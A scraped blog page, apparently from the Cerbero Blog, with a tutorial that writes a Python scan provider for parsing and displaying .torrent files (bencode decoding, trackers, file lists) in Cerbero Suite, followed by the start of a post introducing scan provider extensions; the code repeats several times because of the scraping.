menu-item-2181"><a href="https://cerbero.io/suite/">Cerbero Suite</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2183"><a href="https://cerbero.io/engine/">Cerbero Engine</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2567"><a href="https://cerbero.io/packages/">Packages</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2430"><a href="https://cerbero.io/e-zine/">E-Zine</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1926"><a href="/">Blog</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2791"><a href="#">Support</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3000"><a href="https://cerbero.io/manual/">User Manual</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2165"><a href="https://sdk.cerbero.io/">SDK Documentation</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2514"><a href="https://cerbero.io/faq/">FAQ</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1927"><a href="https://cerbero.io/resources/">Resources</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1930"><a href="https://cerbero.io/contact/">Contact</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2792"><a href="https://cerbero.io/shop/">Shop</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1928"><a href="https://cerbero.io/my-account/">My account</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1929"><a href="https://cerbero.io/cart/">Cart</a></li> </ul> </li> </ul></div></nav> <div class="site-info"> <span class="site-title"><a href="https://blog.cerbero.io/" rel="home">Cerbero Blog</a></span> <a href="https://wordpress.org/" class="imprint"> Proudly powered by WordPress </a></div></footer><script type="speculationrules">{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/wp-content\/uploads\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/twentysixteen-child\/*","\/wp-content\/themes\/twentysixteen\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}</script> <script src="//blog.cerbero.io/wp-content/cache/wpfc-minified/e5g10mzi/a6zsp.js"></script> <script id="enlighterjs-js-after">!function(e,n){if("undefined"!=typeof EnlighterJS){var o={"selectors":{"block":"pre","inline":"code"},"options":{"indent":4,"ampersandCleanup":true,"linehover":false,"rawcodeDbclick":false,"textOverflow":"scroll","linenumbers":false,"theme":"enlighter","language":"generic","retainCssClasses":false,"collapse":false,"toolbarOuter":"","toolbarTop":"{BTN_RAW}{BTN_COPY}{BTN_WINDOW}{BTN_WEBSITE}","toolbarBottom":""}};(e.EnlighterJSINIT=function(){EnlighterJS.init(o.selectors.block,o.selectors.inline,o.options)})()}else{(n&&(n.error||n.log)||function(){})("Error: EnlighterJS resources not loaded yet!")}}(window,console);</script></s></b></hex><table id="1"></table></hl></ui>
class TorrentObject(CFFObject):

    # ...

    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
            al = d[b"announce-list"]
            for a in al:
                if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes:
                    trackers.append(a[0])
                    dup.add(a[0])
        return trackers

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("")
            sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
            return True
        return False

Trackers

When retrieving data from the dictionary, we also make sure that it is in the correct type, so that the code which handles this data won't end up generating an exception when trying to process an unexpected type.

And now the files:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
class TorrentObject(CFFObject):
# ...
def GetFiles(self):
d = self.GetDictionary()
if not b"info" in d:
return []
d = d[b"info"]
if not type(d) is dict:
return []
files = []
if not b"files" in d:
if b"name" in d and type(d[b"name"]) is bytes:
sz = d.get(b"length", 0)
files.append((d[b"name"], sz if type(sz) is int else 0))
else:
flist = d[b"files"]
if not type(flist) is list:
return []
for fd in flist:
if type(fd) is dict:
if b"path" in fd:
pt = fd[b"path"]
if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
sz = fd.get(b"length", 0)
files.append((pt[0], sz if type(sz) is int else 0))
return files
def filesViewCb(cv, files, code, view, data):
if code == pvnInit:
tv = cv.getView(1)
tv.setColumnCount(2)
labels = NTStringList()
labels.append("Name")
labels.append("Size")
tv.setColumnLabels(labels)
tv.setColumnCWidth(0, 70)
tv.setColumnCWidth(1, 35)
tv.setRowCount(len(files))
return 1
elif code == pvnGetTableRow:
if view.id() == 1:
data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
sz = files[data.row][1]
data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
return 0
class TorrentScanProvider(ScanProvider):
# ...
def _formatViewData(self, sdata):
# ...
elif sdata.fid == self.FormatItem_Files:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hl margin="0"></hl></ui>
class TorrentObject(CFFObject): # ... def GetFiles(self): d = self.GetDictionary() if not b"info" in d: return [] d = d[b"info"] if not type(d) is dict: return [] files = [] if not b"files" in d: if b"name" in d and type(d[b"name"]) is bytes: sz = d.get(b"length", 0) files.append((d[b"name"], sz if type(sz) is int else 0)) else: flist = d[b"files"] if not type(flist) is list: return [] for fd in flist: if type(fd) is dict: if b"path" in fd: pt = fd[b"path"] if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes: sz = fd.get(b"length", 0) files.append((pt[0], sz if type(sz) is int else 0)) return files def filesViewCb(cv, files, code, view, data): if code == pvnInit: tv = cv.getView(1) tv.setColumnCount(2) labels = NTStringList() labels.append("Name") labels.append("Size") tv.setColumnLabels(labels) tv.setColumnCWidth(0, 70) tv.setColumnCWidth(1, 35) tv.setRowCount(len(files)) return 1 elif code == pvnGetTableRow: if view.id() == 1: data.setText(0, files[data.row][0].decode("utf-8", errors="ignore")) sz = files[data.row][1] data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz)) return 0 class TorrentScanProvider(ScanProvider): # ... def _formatViewData(self, sdata): # ... elif sdata.fid == self.FormatItem_Files: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hl margin="0"></hl></ui>
class TorrentObject(CFFObject):

    # ...

    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d: 
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Files:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("
") sdata.setCallback(filesViewCb, self.obj.GetFiles()) return True return False

Files

And that's it. Now again the whole code for a better overview:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
from Pro.Core import *
from Pro.UI import pvnInit, pvnGetTableRow
import pprint
MAX_TORRENT_SIZE = 10485760 # 10 MBs
#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Petru Paler
def decode_int(x, f):
f += 1
newf = x.index(0x65, f)
n = int(x[f:newf])
if x[f] == 0x2D: # -
if x[f + 1] == 0x30:
raise ValueError
elif x[f] == 0x30 and newf != f+1:
raise ValueError
return (n, newf+1)
def decode_string(x, f):
colon = x.index(0x3A, f) # :
n = int(x[f:colon])
if x[f] == 0x30 and colon != f+1:
raise ValueError
colon += 1
return (x[colon:colon+n], colon+n)
def decode_list(x, f):
r, f = [], f+1
while x[f] != 0x65: # e
v, f = decode_func[x[f]](x, f)
r.append(v)
return (r, f + 1)
def decode_dict(x, f):
r, f = {}, f+1
while x[f] != 0x65: # e
k, f = decode_string(x, f)
r[k], f = decode_func[x[f]](x, f)
return (r, f + 1)
decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string
def bdecode(x):
try:
r, l = decode_func[x[0]](x, 0)
except (IndexError, KeyError, ValueError):
return {}
if l != len(x):
return {}
return r
#
# END OF 3RD PARTY CODE
#
class TorrentObject(CFFObject):
def __init__(self):
super(TorrentObject, self).__init__()
self.SetObjectFormatName("TORRENT")
self.SetDefaultEndianness(ENDIANNESS_LITTLE)
self.tdict = None
def GetDictionary(self):
if self.tdict == None:
size = min(self.GetSize(), MAX_TORRENT_SIZE)
data = self.Read(0, size)
self.tdict = bdecode(bytes(data))
return self.tdict
def CreationDate(self):
d = self.GetDictionary()
cd = d.get(b"creation date", None)
if cd == None or not type(cd) is int:
return NTDateTime()
return NTDateTime.fromMSecsSinceEpoch(cd * 1000)
def GetTrackers(self):
d = self.GetDictionary()
trackers = []
dup = set()
if b"announce" in d and type(d[b"announce"]) is bytes:
trackers.append(d[b"announce"])
dup.add(trackers[0])
if b"announce-list" in d:
al = d[b"announce-list"]
for a in al:
if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes:
trackers.append(a[0])
dup.add(a[0])
return trackers
def GetFiles(self):
d = self.GetDictionary()
if not b"info" in d:
return []
d = d[b"info"]
if not type(d) is dict:
return []
files = []
if not b"files" in d:
if b"name" in d and type(d[b"name"]) is bytes:
sz = d.get(b"length", 0)
files.append((d[b"name"], sz if type(sz) is int else 0))
else:
flist = d[b"files"]
if not type(flist) is list:
return []
for fd in flist:
if type(fd) is dict:
if b"path" in fd:
pt = fd[b"path"]
if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
sz = fd.get(b"length", 0)
files.append((pt[0], sz if type(sz) is int else 0))
return files
def trackersViewCb(cv, trackers, code, view, data):
if code == pvnInit:
tv = cv.getView(1)
tv.setColumnCount(1)
labels = NTStringList()
labels.append("Tracker")
tv.setColumnLabels(labels)
tv.setColumnCWidth(0, 70)
tv.setRowCount(len(trackers))
return 1
elif code == pvnGetTableRow:
if view.id() == 1:
data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
return 0
def filesViewCb(cv, files, code, view, data):
if code == pvnInit:
tv = cv.getView(1)
tv.setColumnCount(2)
labels = NTStringList()
labels.append("Name")
labels.append("Size")
tv.setColumnLabels(labels)
tv.setColumnCWidth(0, 70)
tv.setColumnCWidth(1, 35)
tv.setRowCount(len(files))
return 1
elif code == pvnGetTableRow:
if view.id() == 1:
data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
sz = files[data.row][1]
data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
return 0
class TorrentScanProvider(ScanProvider):
def __init__(self):
super(TorrentScanProvider, self).__init__()
self.obj = None
self.meta_keys = [b"created by", b"creation date", b"comment"]
# format item IDs
self.FormatItem_Dictionary = 1
self.FormatItem_Trackers = 2
self.FormatItem_Files = 3
# format item names
self.fi_names = ["Dictionary", "Trackers", "Files"]
def _clear(self):
self.obj = None
def _getObject(self):
return self.obj
def _initObject(self):
self.obj = TorrentObject()
self.obj.Load(self.getStream())
d = self.obj.GetDictionary()
return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR
def _startScan(self):
d = self.obj.GetDictionary()
if any(mk in d for mk in self.meta_keys):
e = ScanEntryData()
e.category = SEC_Privacy
e.type = CT_MetaData
self.addEntry(e)
if self.obj.GetSize() > MAX_TORRENT_SIZE:
e = ScanEntryData()
e.category = SEC_Warn
e.type = CT_UnaccountedSpace
self.addEntry(e)
return self.SCAN_RESULT_FINISHED
def _scanViewData(self, xml, dnode, sdata):
if sdata.type == CT_MetaData:
d = self.obj.GetDictionary()
out = proTextStream()
for mk in self.meta_keys:
if mk in d:
tmk = mk.decode("utf-8", errors="ignore")
if tmk == "creation date":
dt = self.obj.CreationDate()
tmv = dt.toString() if dt.isValid() else "?"
else:
tmv = d[mk].decode("utf-8", errors="ignore")
out._print(tmk)
out._print(": ")
out._print(tmv)
out.nl()
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData(out.buffer)
return True
elif sdata.type == CT_UnaccountedSpace:
sdata.setViews(SCANVIEW_TEXT)
sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,))
return True
return False
def _getFormat(self):
ft = FormatTree()
ft.enableIDs(True)
fi = ft.appendChild(None, self.FormatItem_Dictionary)
ft.appendChild(fi, self.FormatItem_Trackers)
ft.appendChild(fi, self.FormatItem_Files)
return ft
def _formatViewInfo(self, finfo):
if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names):
finfo.text = self.fi_names[finfo.fid - 1]
return True
return False
def _formatViewData(self, sdata):
if sdata.fid == self.FormatItem_Dictionary:
sdata.setViews(SCANVIEW_TEXT)
txt = pprint.pformat(self.obj.GetDictionary())
sdata.data.setData(txt)
return True
elif sdata.fid == self.FormatItem_Trackers:
sdata.setViews(SCANVIEW_CUSTOM)
sdata.data.setData("<ui><hl margin="0"></hl></ui>
from Pro.Core import * from Pro.UI import pvnInit, pvnGetTableRow import pprint MAX_TORRENT_SIZE = 10485760 # 10 MBs # # BEGIN OF 3RD PARTY CODE (adapted to work with Python 3) # # The contents of this file are subject to the BitTorrent Open Source License # Version 1.1 (the License). You may not copy or use this file, in either # source code or executable form, except in compliance with the License. You # may obtain a copy of the License at http://www.bittorrent.com/license/. # # Software distributed under the License is distributed on an AS IS basis, # WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License # for the specific language governing rights and limitations under the # License. # Written by Petru Paler def decode_int(x, f): f += 1 newf = x.index(0x65, f) n = int(x[f:newf]) if x[f] == 0x2D: # - if x[f + 1] == 0x30: raise ValueError elif x[f] == 0x30 and newf != f+1: raise ValueError return (n, newf+1) def decode_string(x, f): colon = x.index(0x3A, f) # : n = int(x[f:colon]) if x[f] == 0x30 and colon != f+1: raise ValueError colon += 1 return (x[colon:colon+n], colon+n) def decode_list(x, f): r, f = [], f+1 while x[f] != 0x65: # e v, f = decode_func[x[f]](x, f) r.append(v) return (r, f + 1) def decode_dict(x, f): r, f = {}, f+1 while x[f] != 0x65: # e k, f = decode_string(x, f) r[k], f = decode_func[x[f]](x, f) return (r, f + 1) decode_func = {} decode_func[0x6C] = decode_list # l decode_func[0x64] = decode_dict # d decode_func[0x69] = decode_int # i decode_func[0x30] = decode_string decode_func[0x31] = decode_string decode_func[0x32] = decode_string decode_func[0x33] = decode_string decode_func[0x34] = decode_string decode_func[0x35] = decode_string decode_func[0x36] = decode_string decode_func[0x37] = decode_string decode_func[0x38] = decode_string decode_func[0x39] = decode_string def bdecode(x): try: r, l = decode_func[x[0]](x, 0) except (IndexError, KeyError, ValueError): return {} if l != len(x): return {} return r # # END OF 3RD PARTY CODE # class TorrentObject(CFFObject): def __init__(self): super(TorrentObject, self).__init__() self.SetObjectFormatName("TORRENT") self.SetDefaultEndianness(ENDIANNESS_LITTLE) self.tdict = None def GetDictionary(self): if self.tdict == None: size = min(self.GetSize(), MAX_TORRENT_SIZE) data = self.Read(0, size) self.tdict = bdecode(bytes(data)) return self.tdict def CreationDate(self): d = self.GetDictionary() cd = d.get(b"creation date", None) if cd == None or not type(cd) is int: return NTDateTime() return NTDateTime.fromMSecsSinceEpoch(cd * 1000) def GetTrackers(self): d = self.GetDictionary() trackers = [] dup = set() if b"announce" in d and type(d[b"announce"]) is bytes: trackers.append(d[b"announce"]) dup.add(trackers[0]) if b"announce-list" in d: al = d[b"announce-list"] for a in al: if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes: trackers.append(a[0]) dup.add(a[0]) return trackers def GetFiles(self): d = self.GetDictionary() if not b"info" in d: return [] d = d[b"info"] if not type(d) is dict: return [] files = [] if not b"files" in d: if b"name" in d and type(d[b"name"]) is bytes: sz = d.get(b"length", 0) files.append((d[b"name"], sz if type(sz) is int else 0)) else: flist = d[b"files"] if not type(flist) is list: return [] for fd in flist: if type(fd) is dict: if b"path" in fd: pt = fd[b"path"] if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes: sz = fd.get(b"length", 0) files.append((pt[0], sz if type(sz) is int else 0)) return files def trackersViewCb(cv, trackers, code, view, data): if code == pvnInit: tv = cv.getView(1) tv.setColumnCount(1) labels = NTStringList() labels.append("Tracker") tv.setColumnLabels(labels) tv.setColumnCWidth(0, 70) tv.setRowCount(len(trackers)) return 1 elif code == pvnGetTableRow: if view.id() == 1: data.setText(0, trackers[data.row].decode("utf-8", errors="ignore")) return 0 def filesViewCb(cv, files, code, view, data): if code == pvnInit: tv = cv.getView(1) tv.setColumnCount(2) labels = NTStringList() labels.append("Name") labels.append("Size") tv.setColumnLabels(labels) tv.setColumnCWidth(0, 70) tv.setColumnCWidth(1, 35) tv.setRowCount(len(files)) return 1 elif code == pvnGetTableRow: if view.id() == 1: data.setText(0, files[data.row][0].decode("utf-8", errors="ignore")) sz = files[data.row][1] data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz)) return 0 class TorrentScanProvider(ScanProvider): def __init__(self): super(TorrentScanProvider, self).__init__() self.obj = None self.meta_keys = [b"created by", b"creation date", b"comment"] # format item IDs self.FormatItem_Dictionary = 1 self.FormatItem_Trackers = 2 self.FormatItem_Files = 3 # format item names self.fi_names = ["Dictionary", "Trackers", "Files"] def _clear(self): self.obj = None def _getObject(self): return self.obj def _initObject(self): self.obj = TorrentObject() self.obj.Load(self.getStream()) d = self.obj.GetDictionary() return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR def _startScan(self): d = self.obj.GetDictionary() if any(mk in d for mk in self.meta_keys): e = ScanEntryData() e.category = SEC_Privacy e.type = CT_MetaData self.addEntry(e) if self.obj.GetSize() > MAX_TORRENT_SIZE: e = ScanEntryData() e.category = SEC_Warn e.type = CT_UnaccountedSpace self.addEntry(e) return self.SCAN_RESULT_FINISHED def _scanViewData(self, xml, dnode, sdata): if sdata.type == CT_MetaData: d = self.obj.GetDictionary() out = proTextStream() for mk in self.meta_keys: if mk in d: tmk = mk.decode("utf-8", errors="ignore") if tmk == "creation date": dt = self.obj.CreationDate() tmv = dt.toString() if dt.isValid() else "?" else: tmv = d[mk].decode("utf-8", errors="ignore") out._print(tmk) out._print(": ") out._print(tmv) out.nl() sdata.setViews(SCANVIEW_TEXT) sdata.data.setData(out.buffer) return True elif sdata.type == CT_UnaccountedSpace: sdata.setViews(SCANVIEW_TEXT) sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,)) return True return False def _getFormat(self): ft = FormatTree() ft.enableIDs(True) fi = ft.appendChild(None, self.FormatItem_Dictionary) ft.appendChild(fi, self.FormatItem_Trackers) ft.appendChild(fi, self.FormatItem_Files) return ft def _formatViewInfo(self, finfo): if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names): finfo.text = self.fi_names[finfo.fid - 1] return True return False def _formatViewData(self, sdata): if sdata.fid == self.FormatItem_Dictionary: sdata.setViews(SCANVIEW_TEXT) txt = pprint.pformat(self.obj.GetDictionary()) sdata.data.setData(txt) return True elif sdata.fid == self.FormatItem_Trackers: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("<ui><hl margin="0"></hl></ui>
from Pro.Core import *
from Pro.UI import pvnInit, pvnGetTableRow
import pprint

MAX_TORRENT_SIZE = 10485760 # 10 MBs

#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License).  You may not copy or use this file, in either
# source code or executable form, except in compliance with the License.  You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied.  See the License
# for the specific language governing rights and limitations under the
# License.

# Written by Petru Paler

def decode_int(x, f):
    f += 1
    newf = x.index(0x65, f)
    n = int(x[f:newf])
    if x[f] == 0x2D: # -
        if x[f + 1] == 0x30:
            raise ValueError
    elif x[f] == 0x30 and newf != f+1:
        raise ValueError
    return (n, newf+1)

def decode_string(x, f):
    colon = x.index(0x3A, f) # :
    n = int(x[f:colon])
    if x[f] == 0x30 and colon != f+1:
        raise ValueError
    colon += 1
    return (x[colon:colon+n], colon+n)

def decode_list(x, f):
    r, f = [], f+1
    while x[f] != 0x65: # e
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)

def decode_dict(x, f):
    r, f = {}, f+1
    while x[f] != 0x65: # e
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)

decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int  # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string

def bdecode(x):
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        return {}
    if l != len(x):
        return {}
    return r
    
#
# END OF 3RD PARTY CODE
#

class TorrentObject(CFFObject):

    def __init__(self):
        super(TorrentObject, self).__init__()
        self.SetObjectFormatName("TORRENT")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)
        self.tdict = None
        
    def GetDictionary(self):
        if self.tdict == None:
            size = min(self.GetSize(), MAX_TORRENT_SIZE)
            data = self.Read(0, size)
            self.tdict = bdecode(bytes(data))
        return self.tdict
        
    def CreationDate(self):
        d = self.GetDictionary()
        cd = d.get(b"creation date", None)
        if cd == None or not type(cd) is int:
            return NTDateTime()
        return NTDateTime.fromMSecsSinceEpoch(cd * 1000)
        
    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
            al = d[b"announce-list"]
            for a in al:
                if type(a) is list and len(a) > 0 and a[0] not in dup and type(a[0]) is bytes:
                    trackers.append(a[0])
                    dup.add(a[0])
        return trackers
        
    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d: 
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0
    
def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    def __init__(self):
        super(TorrentScanProvider, self).__init__()
        self.obj = None
        self.meta_keys = [b"created by", b"creation date", b"comment"]
        
        # format item IDs
        self.FormatItem_Dictionary = 1
        self.FormatItem_Trackers = 2
        self.FormatItem_Files = 3
        # format item names
        self.fi_names = ["Dictionary", "Trackers", "Files"]

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TorrentObject()
        self.obj.Load(self.getStream())
        d = self.obj.GetDictionary()
        return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR

    def _startScan(self):
        d = self.obj.GetDictionary()
        if any(mk in d for mk in self.meta_keys):
            e = ScanEntryData()
            e.category = SEC_Privacy
            e.type = CT_MetaData
            self.addEntry(e)
        if self.obj.GetSize() > MAX_TORRENT_SIZE:
            e = ScanEntryData()
            e.category = SEC_Warn
            e.type = CT_UnaccountedSpace
            self.addEntry(e)
        return self.SCAN_RESULT_FINISHED

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_MetaData:
            d = self.obj.GetDictionary()
            out = proTextStream()
            for mk in self.meta_keys:
                if mk in d:
                    tmk = mk.decode("utf-8", errors="ignore")
                    if tmk == "creation date":
                        dt = self.obj.CreationDate()
                        tmv = dt.toString() if dt.isValid() else "?"
                    else:
                        tmv = d[mk].decode("utf-8", errors="ignore")
                    out._print(tmk)
                    out._print(": ")
                    out._print(tmv)
                    out.nl()
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData(out.buffer)
            return True
        elif sdata.type == CT_UnaccountedSpace:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,))
            return True
        return False
        
    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, self.FormatItem_Dictionary)
        ft.appendChild(fi, self.FormatItem_Trackers)
        ft.appendChild(fi, self.FormatItem_Files)
        return ft
        
    def _formatViewInfo(self, finfo):
        if finfo.fid >= 1 or finfo.fid - 1 < len(self.fi_names):
            finfo.text = self.fi_names[finfo.fid - 1]
            return True
        return False
        
    def _formatViewData(self, sdata):
        if sdata.fid == self.FormatItem_Dictionary:
            sdata.setViews(SCANVIEW_TEXT)
            txt = pprint.pformat(self.obj.GetDictionary())
            sdata.data.setData(txt)
            return True
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("
") sdata.setCallback(trackersViewCb, self.obj.GetTrackers()) return True elif sdata.fid == self.FormatItem_Files: sdata.setViews(SCANVIEW_CUSTOM) sdata.data.setData("
") sdata.setCallback(filesViewCb, self.obj.GetFiles()) return True return False def torrentAllocator(): return TorrentScanProvider()

We could still extract more information from the torrent file. For instance, we could show the list of hashes and to which portion of which file they belong to. If that's interesting for forensic purposes, we can easily add this view in the future.

Scan Providers

Version 2.5.0 is close to being released and comes with the last type of extension exposed to Python: scan providers. Scan providers extensions are not only the most complex type of extensions, but also the most powerful ones as they allow to add support for new file formats entirely from Python!

This feature required exposing a lot more of the SDK to Python and can’t be completely discussed in one post. This post is going to introduce the topic, while future posts will show real life examples.

Let’s start from the list of Python scan providers under Extensions -> Scan providers:

Scan provider extensions

This list is retrieved from the configuration file ‘scanp.cfg’. Here’s an example entry:

Plain text
Copy to clipboard
Open code in new window
EnlighterJS 3 Syntax Highlighter
[TEST]
label = Test scan provider
ext = test2,test3
group = db
file = Test.py
allocator = allocator
